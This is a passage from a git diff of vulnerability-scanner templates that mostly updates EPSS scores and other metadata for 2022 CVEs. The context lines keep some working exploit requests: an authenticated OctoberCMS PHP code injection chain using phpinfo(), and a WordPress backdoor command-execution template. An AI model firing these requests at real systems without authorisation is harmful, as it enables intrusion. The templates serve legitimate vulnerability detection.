0.03442 cpe: cpe:2.3:a:sitemap_project:sitemap:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.90248 metadata: max-request: 3 verified: true diff --git a/http/cves/2022/CVE-2022-0954.yaml b/http/cves/2022/CVE-2022-0954.yaml index b7f8b3cd6a..e317c298ce 100644 --- a/http/cves/2022/CVE-2022-0954.yaml +++ b/http/cves/2022/CVE-2022-0954.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00192 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* + epss-percentile: 0.55945 metadata: max-request: 3 verified: true diff --git a/http/cves/2022/CVE-2022-0963.yaml b/http/cves/2022/CVE-2022-0963.yaml index 71e2ac58d7..8499f7077f 100644 --- a/http/cves/2022/CVE-2022-0963.yaml +++ b/http/cves/2022/CVE-2022-0963.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-79 epss-score: 0.00192 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* + epss-percentile: 0.55945 metadata: max-request: 3 verified: true diff --git a/http/cves/2022/CVE-2022-0968.yaml b/http/cves/2022/CVE-2022-0968.yaml index 3af98a9ab4..b91204eabe 100644 --- a/http/cves/2022/CVE-2022-0968.yaml +++ b/http/cves/2022/CVE-2022-0968.yaml @@ -20,6 +20,7 @@ info: cwe-id: CWE-190 epss-score: 0.00091 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* + epss-percentile: 0.38112 metadata: max-request: 3 vendor: microweber diff --git a/http/cves/2022/CVE-2022-1007.yaml b/http/cves/2022/CVE-2022-1007.yaml index 0757f6d2c7..0d50f91768 100644 --- a/http/cves/2022/CVE-2022-1007.yaml +++ b/http/cves/2022/CVE-2022-1007.yaml @@ -18,6 +18,7 @@ info: cwe-id: CWE-79 epss-score: 0.00112 cpe: cpe:2.3:a:elbtide:advanced_booking_calendar:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.43971 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-1013.yaml b/http/cves/2022/CVE-2022-1013.yaml index e9eea8b993..9d777dff1b 100644 --- a/http/cves/2022/CVE-2022-1013.yaml +++ b/http/cves/2022/CVE-2022-1013.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1013 cwe-id: CWE-89 - epss-score: 0.01018 + epss-score: 0.01144 cpe: cpe:2.3:a:ays-pro:personal_dictionary:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.82961 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-1020.yaml b/http/cves/2022/CVE-2022-1020.yaml index 9df09c8dd3..b80d5108f4 100644 --- a/http/cves/2022/CVE-2022-1020.yaml +++ b/http/cves/2022/CVE-2022-1020.yaml @@ -15,6 +15,7 @@ info: cwe-id: CWE-352 epss-score: 0.00614 cpe: cpe:2.3:a:codeastrology:woo_product_table:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.76048 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2022/CVE-2022-1040.yaml b/http/cves/2022/CVE-2022-1040.yaml index c9b4dfd36b..0258c25b77 100644 --- a/http/cves/2022/CVE-2022-1040.yaml +++ b/http/cves/2022/CVE-2022-1040.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1040 cwe-id: CWE-287 - epss-score: 0.97468 + epss-score: 0.97499 cpe: cpe:2.3:o:sophos:sfos:*:*:*:*:*:*:*:* + epss-percentile: 0.99961 metadata: max-request: 1 shodan-query: http.title:"Sophos" diff --git a/http/cves/2022/CVE-2022-1054.yaml b/http/cves/2022/CVE-2022-1054.yaml index b0c26afb10..cb54c8285a 100644 --- a/http/cves/2022/CVE-2022-1054.yaml +++ b/http/cves/2022/CVE-2022-1054.yaml @@ -12,8 +12,9 @@ info: cvss-score: 5.3 cve-id: CVE-2022-1054 cwe-id: CWE-862 - epss-score: 0.00348 + epss-score: 0.0033 cpe: cpe:2.3:a:wpchill:rsvp_and_event_management:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.67328 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2022/CVE-2022-1057.yaml b/http/cves/2022/CVE-2022-1057.yaml index 4ac02df774..dd62369a81 100644 --- a/http/cves/2022/CVE-2022-1057.yaml +++ b/http/cves/2022/CVE-2022-1057.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1057 cwe-id: CWE-89 - epss-score: 0.01364 + epss-score: 0.01851 cpe: cpe:2.3:a:varktech:pricing_deals_for_woocommerce:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.8685 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-1058.yaml b/http/cves/2022/CVE-2022-1058.yaml index 66fbe06f71..32368a8832 100644 --- a/http/cves/2022/CVE-2022-1058.yaml +++ b/http/cves/2022/CVE-2022-1058.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-601 epss-score: 0.00112 cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:* + epss-percentile: 0.43971 metadata: max-request: 2 shodan-query: title:"Gitea" diff --git a/http/cves/2022/CVE-2022-1119.yaml b/http/cves/2022/CVE-2022-1119.yaml index 51f847bcf3..b0fdc4675e 100644 --- a/http/cves/2022/CVE-2022-1119.yaml +++ b/http/cves/2022/CVE-2022-1119.yaml @@ -17,8 +17,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-1119 cwe-id: CWE-22 - epss-score: 0.22681 + epss-score: 0.29102 cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.96285 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2022/CVE-2022-1162.yaml b/http/cves/2022/CVE-2022-1162.yaml index 937979f9eb..c90f990cb6 100644 --- a/http/cves/2022/CVE-2022-1162.yaml +++ b/http/cves/2022/CVE-2022-1162.yaml @@ -19,6 +19,7 @@ info: cwe-id: CWE-798 epss-score: 0.20604 cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* + epss-percentile: 0.95726 metadata: max-request: 1 shodan-query: http.title:"GitLab" diff --git a/http/cves/2022/CVE-2022-1168.yaml b/http/cves/2022/CVE-2022-1168.yaml index 629025bae4..e5e4e13ace 100644 --- a/http/cves/2022/CVE-2022-1168.yaml +++ b/http/cves/2022/CVE-2022-1168.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00112 cpe: cpe:2.3:a:eyecix:jobsearch_wp_job_board:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.43971 metadata: max-request: 1 google-query: inurl:"wp-content/plugins/wp-jobsearch" diff --git a/http/cves/2022/CVE-2022-1221.yaml b/http/cves/2022/CVE-2022-1221.yaml index 808806f13a..080c66e946 100644 --- a/http/cves/2022/CVE-2022-1221.yaml +++ b/http/cves/2022/CVE-2022-1221.yaml @@ -17,6 +17,7 @@ info: cwe-id: CWE-79 epss-score: 0.00119 cpe: cpe:2.3:a:gwyn\'s_imagemap_selector_project:gwyn\'s_imagemap_selector:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.45304 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-1329.yaml b/http/cves/2022/CVE-2022-1329.yaml index 6650a6aabf..e3c5049c73 100644 --- a/http/cves/2022/CVE-2022-1329.yaml +++ b/http/cves/2022/CVE-2022-1329.yaml @@ -17,8 +17,9 @@ info: cvss-score: 8.8 cve-id: CVE-2022-1329 cwe-id: CWE-434,CWE-862 - epss-score: 0.96563 + epss-score: 0.96419 cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.99372 metadata: max-request: 4 verified: true diff --git a/http/cves/2022/CVE-2022-1386.yaml b/http/cves/2022/CVE-2022-1386.yaml index 85ace3beff..4a03063335 100644 --- a/http/cves/2022/CVE-2022-1386.yaml +++ b/http/cves/2022/CVE-2022-1386.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1386 cwe-id: CWE-918 - epss-score: 0.0683 + epss-score: 0.08014 cpe: cpe:2.3:a:theme-fusion:avada:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.93446 metadata: max-request: 2 framework: wordpress diff --git a/http/cves/2022/CVE-2022-1388.yaml b/http/cves/2022/CVE-2022-1388.yaml index c3e44df4bd..328923db65 100644 --- a/http/cves/2022/CVE-2022-1388.yaml +++ b/http/cves/2022/CVE-2022-1388.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1388 cwe-id: CWE-306 - epss-score: 0.9747 + epss-score: 0.9748 cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* + epss-percentile: 0.9995 metadata: max-request: 2 shodan-query: http.title:"BIG-IP®-+Redirect" +"Server" diff --git a/http/cves/2022/CVE-2022-1390.yaml b/http/cves/2022/CVE-2022-1390.yaml index 38d76b2b10..0ee9dfb5a7 100644 --- a/http/cves/2022/CVE-2022-1390.yaml +++ b/http/cves/2022/CVE-2022-1390.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1390 cwe-id: CWE-22 - epss-score: 0.96598 + epss-score: 0.96676 cpe: cpe:2.3:a:admin_word_count_column_project:admin_word_count_column:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.99485 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2022/CVE-2022-1391.yaml b/http/cves/2022/CVE-2022-1391.yaml index 3fcddf7b5c..3f89e4dd0a 100644 --- a/http/cves/2022/CVE-2022-1391.yaml +++ b/http/cves/2022/CVE-2022-1391.yaml @@ -16,8 +16,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1391 cwe-id: CWE-22 - epss-score: 0.01865 + epss-score: 0.02167 cpe: cpe:2.3:a:kanev:cab_fare_calculator:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.87921 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2022/CVE-2022-1392.yaml b/http/cves/2022/CVE-2022-1392.yaml index a6f0cf1685..e279300c76 100644 --- a/http/cves/2022/CVE-2022-1392.yaml +++ b/http/cves/2022/CVE-2022-1392.yaml @@ -14,8 +14,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-1392 cwe-id: CWE-22 - epss-score: 0.01015 + epss-score: 0.01182 cpe: cpe:2.3:a:commoninja:videos_sync_pdf:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.83293 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-1398.yaml b/http/cves/2022/CVE-2022-1398.yaml index 8e0a460c7b..ea8e1b5749 100644 --- a/http/cves/2022/CVE-2022-1398.yaml +++ b/http/cves/2022/CVE-2022-1398.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.5 cve-id: CVE-2022-1398 cwe-id: CWE-918 - epss-score: 0.00308 + epss-score: 0.0048 cpe: cpe:2.3:a:external_media_without_import_project:external_media_without_import:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.72781 metadata: max-request: 3 verified: true diff --git a/http/cves/2022/CVE-2022-1439.yaml b/http/cves/2022/CVE-2022-1439.yaml index dff86b949d..789f35f5d3 100644 --- a/http/cves/2022/CVE-2022-1439.yaml +++ b/http/cves/2022/CVE-2022-1439.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-1439 cwe-id: CWE-79 - epss-score: 0.00112 + epss-score: 0.00113 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* + epss-percentile: 0.44027 metadata: max-request: 1 shodan-query: http.favicon.hash:780351152 diff --git a/http/cves/2022/CVE-2022-1442.yaml b/http/cves/2022/CVE-2022-1442.yaml index 7559a4e70e..4a693ec9e3 100644 --- a/http/cves/2022/CVE-2022-1442.yaml +++ b/http/cves/2022/CVE-2022-1442.yaml @@ -17,8 +17,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-1442 cwe-id: CWE-862 - epss-score: 0.02422 + epss-score: 0.07166 cpe: cpe:2.3:a:wpmet:metform_elementor_contact_form_builder:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.93146 metadata: max-request: 2 google-query: inurl:/wp-content/plugins/metform diff --git a/http/cves/2022/CVE-2022-1574.yaml b/http/cves/2022/CVE-2022-1574.yaml index 6b217c3e62..e4f850a1d0 100644 --- a/http/cves/2022/CVE-2022-1574.yaml +++ b/http/cves/2022/CVE-2022-1574.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1574 cwe-id: CWE-352 - epss-score: 0.0306 + epss-score: 0.02682 cpe: cpe:2.3:a:html2wp_project:html2wp:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.89096 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-1595.yaml b/http/cves/2022/CVE-2022-1595.yaml index 2297ac5491..26b4d3968d 100644 --- a/http/cves/2022/CVE-2022-1595.yaml +++ b/http/cves/2022/CVE-2022-1595.yaml @@ -15,8 +15,9 @@ info: cvss-score: 5.3 cve-id: CVE-2022-1595 cwe-id: CWE-200 - epss-score: 0.0015 + epss-score: 0.0018 cpe: cpe:2.3:a:hc_custom_wp-admin_url_project:hc_custom_wp-admin_url:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.54465 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-1597.yaml b/http/cves/2022/CVE-2022-1597.yaml index 9da75d75a1..8d7db98bf4 100644 --- a/http/cves/2022/CVE-2022-1597.yaml +++ b/http/cves/2022/CVE-2022-1597.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00252 cpe: cpe:2.3:a:2code:wpqa_builder:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.62319 metadata: max-request: 2 google-query: inurl:/wp-content/plugins/wpqa diff --git a/http/cves/2022/CVE-2022-1598.yaml b/http/cves/2022/CVE-2022-1598.yaml index d656c89498..6bb2f4d395 100644 --- a/http/cves/2022/CVE-2022-1598.yaml +++ b/http/cves/2022/CVE-2022-1598.yaml @@ -15,8 +15,9 @@ info: cvss-score: 5.3 cve-id: CVE-2022-1598 cwe-id: CWE-306 - epss-score: 0.01854 + epss-score: 0.02766 cpe: cpe:2.3:a:2code:wpqa_builder:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.89258 metadata: max-request: 1 google-query: inurl:/wp-content/plugins/wpqa diff --git a/http/cves/2022/CVE-2022-1609.yaml b/http/cves/2022/CVE-2022-1609.yaml index 99e9c16d71..2f24f3a371 100644 --- a/http/cves/2022/CVE-2022-1609.yaml +++ b/http/cves/2022/CVE-2022-1609.yaml @@ -8,16 +8,15 @@ info: reference: - https://wpscan.com/vulnerability/e2d546c9-85b6-47a4-b951-781b9ae5d0f2 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1609 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2022-1609 + cwe-id: CWE-77 metadata: max-request: 1 verified: false - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cve-id: CVE-2022-1609 - cwe-id: CWE-77 tags: rce,wp,backdoor,wpscan,cve,cve2022,wordpress - variables: cmd: "echo CVE-2022-1609 | rev" diff --git a/http/cves/2022/CVE-2022-1713.yaml b/http/cves/2022/CVE-2022-1713.yaml index 8b15ca056f..30d7c9b456 100644 --- a/http/cves/2022/CVE-2022-1713.yaml +++ b/http/cves/2022/CVE-2022-1713.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-1713 cwe-id: CWE-918 - epss-score: 0.00708 + epss-score: 0.00967 cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:* + epss-percentile: 0.81398 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-1724.yaml b/http/cves/2022/CVE-2022-1724.yaml index ea236c8ff0..5f2d3d7231 100644 --- a/http/cves/2022/CVE-2022-1724.yaml +++ b/http/cves/2022/CVE-2022-1724.yaml @@ -13,8 +13,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-1724 cwe-id: CWE-79 - epss-score: 0.001 + epss-score: 0.00119 cpe: cpe:2.3:a:simple-membership-plugin:simple_membership:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.45304 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-1756.yaml b/http/cves/2022/CVE-2022-1756.yaml index a277f57809..66bd61419d 100644 --- a/http/cves/2022/CVE-2022-1756.yaml +++ b/http/cves/2022/CVE-2022-1756.yaml @@ -6,21 +6,27 @@ info: severity: medium description: | The Newsletter WordPress plugin before 7.4.5 does not sanitize and escape the $_SERVER['REQUEST_URI'] before echoing it back in admin pages. Although this uses addslashes, and most modern browsers automatically URLEncode requests, this is still vulnerable to Reflected XSS in older browsers such as Internet Explorer 9 or below. - remediation: Fixed in version 7.4.5 reference: - https://wpscan.com/vulnerability/6ad407fe-db2b-41fb-834b-dd8c4f62b072 - https://nvd.nist.gov/vuln/detail/CVE-2022-1756 - https://wordpress.org/plugins/newsletter/ + remediation: Fixed in version 7.4.5 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-1756 cwe-id: CWE-79 + epss-score: 0.00099 + cpe: cpe:2.3:a:thenewsletterplugin:newsletter:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.40272 metadata: verified: true publicwww-query: "/wp-content/plugins/newsletter/" max-request: 2 - tags: cve,cve2022,newsletter,xss,authenticated + framework: wordpress + vendor: thenewsletterplugin + product: newsletter + tags: wpscan,cve,cve2022,newsletter,xss,authenticated http: - raw: diff --git a/http/cves/2022/CVE-2022-1768.yaml b/http/cves/2022/CVE-2022-1768.yaml index ff5961fb7d..f6f92d056e 100644 --- a/http/cves/2022/CVE-2022-1768.yaml +++ b/http/cves/2022/CVE-2022-1768.yaml @@ -17,8 +17,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-1768 cwe-id: CWE-89 - epss-score: 0.67513 + epss-score: 0.63139 cpe: cpe:2.3:a:rsvpmaker_project:rsvpmaker:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.97399 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-1815.yaml b/http/cves/2022/CVE-2022-1815.yaml index 572e6fb021..d1fc8cd683 100644 --- a/http/cves/2022/CVE-2022-1815.yaml +++ b/http/cves/2022/CVE-2022-1815.yaml @@ -16,8 +16,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-1815 cwe-id: CWE-918,CWE-200 - epss-score: 0.00637 + epss-score: 0.0087 cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:* + epss-percentile: 0.80286 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-1883.yaml b/http/cves/2022/CVE-2022-1883.yaml index 324087e64f..bf639ebac9 100644 --- a/http/cves/2022/CVE-2022-1883.yaml +++ b/http/cves/2022/CVE-2022-1883.yaml @@ -16,8 +16,9 @@ info: cvss-score: 8.8 cve-id: CVE-2022-1883 cwe-id: CWE-89 - epss-score: 0.11165 + epss-score: 0.12349 cpe: cpe:2.3:a:camptocamp:terraboard:*:*:*:*:*:*:*:* + epss-percentile: 0.94679 metadata: max-request: 1 vendor: camptocamp diff --git a/http/cves/2022/CVE-2022-1903.yaml b/http/cves/2022/CVE-2022-1903.yaml index e771bc8b1f..d95ec4861f 100644 --- a/http/cves/2022/CVE-2022-1903.yaml +++ b/http/cves/2022/CVE-2022-1903.yaml @@ -16,8 +16,9 @@ info: cvss-score: 8.1 cve-id: CVE-2022-1903 cwe-id: CWE-862 - epss-score: 0.2399 + epss-score: 0.31334 cpe: cpe:2.3:a:armemberplugin:armember:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.96409 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-1904.yaml b/http/cves/2022/CVE-2022-1904.yaml index 75a35b4ed9..4ceca94931 100644 --- a/http/cves/2022/CVE-2022-1904.yaml +++ b/http/cves/2022/CVE-2022-1904.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00097 cpe: cpe:2.3:a:fatcatapps:easy_pricing_tables:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.39802 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-1906.yaml b/http/cves/2022/CVE-2022-1906.yaml index 12586692f6..0acc0e73ea 100644 --- a/http/cves/2022/CVE-2022-1906.yaml +++ b/http/cves/2022/CVE-2022-1906.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-1906 cwe-id: CWE-79 - epss-score: 0.00092 + epss-score: 0.001 cpe: cpe:2.3:a:digiprove:copyright_proof:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.40471 metadata: max-request: 1 google-query: inurl:/wp-content/plugins/digiproveblog diff --git a/http/cves/2022/CVE-2022-1910.yaml b/http/cves/2022/CVE-2022-1910.yaml index 43ebae10cb..7954c5798e 100644 --- a/http/cves/2022/CVE-2022-1910.yaml +++ b/http/cves/2022/CVE-2022-1910.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-1910 cwe-id: CWE-79 - epss-score: 0.00078 + epss-score: 0.00119 cpe: cpe:2.3:a:averta:shortcodes_and_extra_features_for_phlox_theme:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.45304 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-1916.yaml b/http/cves/2022/CVE-2022-1916.yaml index 685fdb3f5b..6bd8b97fca 100644 --- a/http/cves/2022/CVE-2022-1916.yaml +++ b/http/cves/2022/CVE-2022-1916.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00097 cpe: cpe:2.3:a:pluginus:active_products_tables_for_woocommerce:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.39802 metadata: max-request: 1 framework: wordpress diff --git a/http/cves/2022/CVE-2022-1933.yaml b/http/cves/2022/CVE-2022-1933.yaml index 204339f4eb..5a2bc04f0c 100644 --- a/http/cves/2022/CVE-2022-1933.yaml +++ b/http/cves/2022/CVE-2022-1933.yaml @@ -15,8 +15,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-1933 cwe-id: CWE-79 - epss-score: 0.00092 + epss-score: 0.00097 cpe: cpe:2.3:a:collect_and_deliver_interface_for_woocommerce_project:collect_and_deliver_interface_for_woocommerce:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.39802 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-1937.yaml b/http/cves/2022/CVE-2022-1937.yaml index bdcdaf0428..8e1fbee0e0 100644 --- a/http/cves/2022/CVE-2022-1937.yaml +++ b/http/cves/2022/CVE-2022-1937.yaml @@ -14,8 +14,9 @@ info: cvss-score: 6.1 cve-id: CVE-2022-1937 cwe-id: CWE-79 - epss-score: 0.00092 + epss-score: 0.00097 cpe: cpe:2.3:a:awin:awin_data_feed:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.39802 metadata: max-request: 2 verified: true diff --git a/http/cves/2022/CVE-2022-1946.yaml b/http/cves/2022/CVE-2022-1946.yaml index ab9d3a0720..22260c128a 100644 --- a/http/cves/2022/CVE-2022-1946.yaml +++ b/http/cves/2022/CVE-2022-1946.yaml @@ -16,6 +16,7 @@ info: cwe-id: CWE-79 epss-score: 0.00097 cpe: cpe:2.3:a:wpdevart:gallery:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.39802 metadata: max-request: 1 google-query: inurl:"/wp-content/plugins/gallery-album/" diff --git a/http/cves/2022/CVE-2022-1952.yaml b/http/cves/2022/CVE-2022-1952.yaml index 0ba4a5202e..0ec4a6eea1 100644 --- a/http/cves/2022/CVE-2022-1952.yaml +++ b/http/cves/2022/CVE-2022-1952.yaml @@ -15,8 +15,9 @@ info: cvss-score: 9.8 cve-id: CVE-2022-1952 cwe-id: CWE-434 - epss-score: 0.96089 + epss-score: 0.95933 cpe: cpe:2.3:a:syntactics:free_booking_plugin_for_hotels\,_restaurant_and_car_rental:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.99225 metadata: max-request: 3 verified: true diff --git a/http/cves/2022/CVE-2022-2034.yaml b/http/cves/2022/CVE-2022-2034.yaml index 543b33b431..36693fe41d 100644 --- a/http/cves/2022/CVE-2022-2034.yaml +++ b/http/cves/2022/CVE-2022-2034.yaml @@ -16,8 +16,9 @@ info: cvss-score: 5.3 cve-id: CVE-2022-2034 cwe-id: CWE-639 - epss-score: 0.00511 + epss-score: 0.00569 cpe: cpe:2.3:a:automattic:sensei_lms:*:*:*:*:*:wordpress:*:* + epss-percentile: 0.75021 metadata: max-request: 100 verified: true diff --git a/http/cves/2022/CVE-2022-21371.yaml b/http/cves/2022/CVE-2022-21371.yaml index 101fbb8c9d..d23411f96e 100644 --- a/http/cves/2022/CVE-2022-21371.yaml +++ b/http/cves/2022/CVE-2022-21371.yaml @@ -15,8 +15,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-21371 cwe-id: CWE-22 - epss-score: 0.96639 + epss-score: 0.96287 cpe: cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:* + epss-percentile: 0.99331 metadata: max-request: 2 vendor: oracle diff --git a/http/cves/2022/CVE-2022-21500.yaml b/http/cves/2022/CVE-2022-21500.yaml index 4cb90ce2d7..0564058e8f 100644 --- a/http/cves/2022/CVE-2022-21500.yaml +++ b/http/cves/2022/CVE-2022-21500.yaml @@ -16,8 +16,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-21500 - epss-score: 0.96395 + epss-score: 0.95664 cpe: cpe:2.3:a:oracle:e-business_suite:12.2:*:*:*:*:*:*:* + epss-percentile: 0.99159 metadata: max-request: 1 shodan-query: http.title:"Login" "X-ORACLE-DMS-ECID" 200 diff --git a/http/cves/2022/CVE-2022-21587.yaml b/http/cves/2022/CVE-2022-21587.yaml index ecb9d963dc..18d512a3da 100644 --- a/http/cves/2022/CVE-2022-21587.yaml +++ b/http/cves/2022/CVE-2022-21587.yaml @@ -15,9 +15,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-21587 - cwe-id: CWE-94 - epss-score: 0.97334 + cwe-id: CWE-306 + epss-score: 0.97288 cpe: cpe:2.3:a:oracle:e-business_suite:*:*:*:*:*:*:*:* + epss-percentile: 0.99785 metadata: max-request: 3 vendor: oracle diff --git a/http/cves/2022/CVE-2022-21661.yaml b/http/cves/2022/CVE-2022-21661.yaml index 7e4495e59c..d5f030c58f 100644 --- a/http/cves/2022/CVE-2022-21661.yaml +++ b/http/cves/2022/CVE-2022-21661.yaml @@ -18,8 +18,9 @@ info: cvss-score: 7.5 cve-id: CVE-2022-21661 cwe-id: CWE-89 - epss-score: 0.93457 + epss-score: 0.93816 cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:* + epss-percentile: 0.98788 metadata: max-request: 1 verified: true diff --git a/http/cves/2022/CVE-2022-21705.yaml b/http/cves/2022/CVE-2022-21705.yaml index 839729e492..be8bbeb77c 100644 --- a/http/cves/2022/CVE-2022-21705.yaml +++ b/http/cves/2022/CVE-2022-21705.yaml @@ -18,8 +18,9 @@ info: cvss-score: 7.2 cve-id: CVE-2022-21705 cwe-id: CWE-74 - epss-score: 0.00405 + epss-score: 0.00519 cpe: cpe:2.3:a:octobercms:october:*:*:*:*:*:*:*:* + epss-percentile: 0.73816 metadata: max-request: 5 vendor: octobercms @@ -31,14 +32,12 @@ http: - | # to obtain session_key and token GET /backend/backend/auth/signin HTTP/1.1 Host: {{Hostname}} - - | # to perform authentication and obtain admin cookies POST /backend/backend/auth/signin HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _session_key={{session_key}}&_token={{token}}&postback=1&login={{username}}&password={{password}} - - | # to inject php code in Markup editor and perform exploit POST /backend/cms HTTP/1.1 Host: {{Hostname}} @@ -48,7 +47,6 @@ http: X-Requested-With: XMLHttpRequest _session_key={{session_key}}&_token={{token}}&settings%5Btitle%5D={{randstr}}&settings%5Burl%5D=%2F{{randstr}}&fileName={{randstr}}&settings%5Blayout%5D=&settings%5Bdescription%5D=&settings%5Bis_hidden%5D=0&settings%5Bmeta_title%5D=&settings%5Bmeta_description%5D=&markup=%3C%3Fphp%0D%0A%0D%0Afunction+onInit()+%7B%0D%0A++++phpinfo()%3B%0D%0A%7D%0D%0A%0D%0A%3F%3E%0D%0A%3D%3D%0D%0A&code=&templateType=page&templatePath=&theme=demo&templateMtime=&templateForceSave=0 - - | # to obtain theme POST /backend/cms HTTP/1.1 Host: {{Hostname}} @@ -58,7 +56,6 @@ http: X-Requested-With: XMLHttpRequest _session_key={{session_key}}&_token={{token}}&search=&type=page - - | # to access the template page for generated exploit POST /backend/cms HTTP/1.1 Host: {{Hostname}} @@ -70,6 +67,7 @@ http: _session_key={{session_key}}&_token={{token}}&search=&{{theme}}=demo&type=page&path={{randstr}}.htm cookie-reuse: true + matchers-condition: and matchers: - type: word @@ -113,4 +111,4 @@ http: internal: true part: body - # Obtain current theme used for Markup editor of OctoberCMS +# Obtain current theme used for Markup editor of OctoberCMS diff --git 